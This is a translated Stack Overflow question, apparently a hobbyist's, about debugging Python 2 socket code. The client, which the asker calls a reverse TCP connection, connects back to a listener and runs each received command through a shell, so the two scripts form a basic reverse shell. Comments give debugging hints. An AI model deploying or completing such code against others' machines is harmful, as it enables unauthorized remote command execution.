【发布时间】:2015-06-17 07:41:00
【问题描述】:
所以,我一直在试验 Python 的套接字模块,并创建了一个简单的 TCP 客户端/服务器设置。一切都在同一个系统(Win7x64)上运行,在 ip 192.168.1.3
这是客户端(这是一个反向 TCP 连接):
import socket, subprocess, time
me = '192.168.1.3'
port = 1332
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
s.connect((me, port))
break
except:
time.sleep(1)
s.send('[*] Connected!')
while True:
data = s.recv(1024)
output = subprocess.check_output(data, shell=True)
s.send(output)
s.close()
这是服务器:
import socket
host = '0.0.0.0'
port = 1332
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(5)
def handler(client):
req = client.recv(1024)
print 'Recieved: %s' % req
command = raw_input('> ')
print 'Sending: %s' % command
client.send(command)
#client.close()
while True:
client,addr = s.accept()
print 'Accepted connection from: %s:%d' % (addr[0], addr[1])
client_handler = threading.Thread(target=handler,args=(client,))
client_handler.start()
这是我在服务器上收到的输出:
Accepted connection from: 192.168.1.3:61147
Recieved: [*] Connected!
Sending: *example command*
然后它就挂在那里。无论我让客户发送什么,它都不会收到它。命令在客户端成功,但没有发回输出。
停下来?
编辑:我已经设法通过将函数中的内容封装在一个循环中来获得服务器接收到的命令的输出:
def handler(client):
while True:
req = client.recv(1024)
print 'Recieved: %s' % req
command = raw_input('> ')
print 'Sending: %s' % command
client.send(command)
所以,如果我发送一个 dir 命令,我会收到一次输出。但是在尝试发送另一个命令时,我得到了这个:
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Users\Jami\Documents\Awn\Eclipse USB Backup\Extracted\Programming\Python\Random Shit\ReverseShell\receiver.py", line 13, in handler
req = client.recv(1024)
error: [Errno 10053] An established connection was aborted by the software in your host machine
编辑:
有人可以推荐一种替代方法吗?我想做的是让服务器1.向客户端发送命令,2.客户端执行它,3.发回输出,4.服务器接收的输出。并且一直持续到用户停止为止。
【问题讨论】:
-
你没有在服务器中读取结果。
-
客户端的目的是将结果发送到服务器,所以是的,我确实在服务器上读取了结果。这是一个反向 TCP 连接。 @丹尼尔
-
不在您发布的代码中!
-
一旦
s被连接,它只会在handler被调用时接收一次。之后它只会尝试接受新的连接。因此,为了让客户端不断与服务器对话,它必须反复关闭连接并重新打开它。也许您应该recv与您的新套接字实例循环。 (免责声明:我不擅长使用套接字) -
建议@Daniel ?
标签: python sockets tcp client server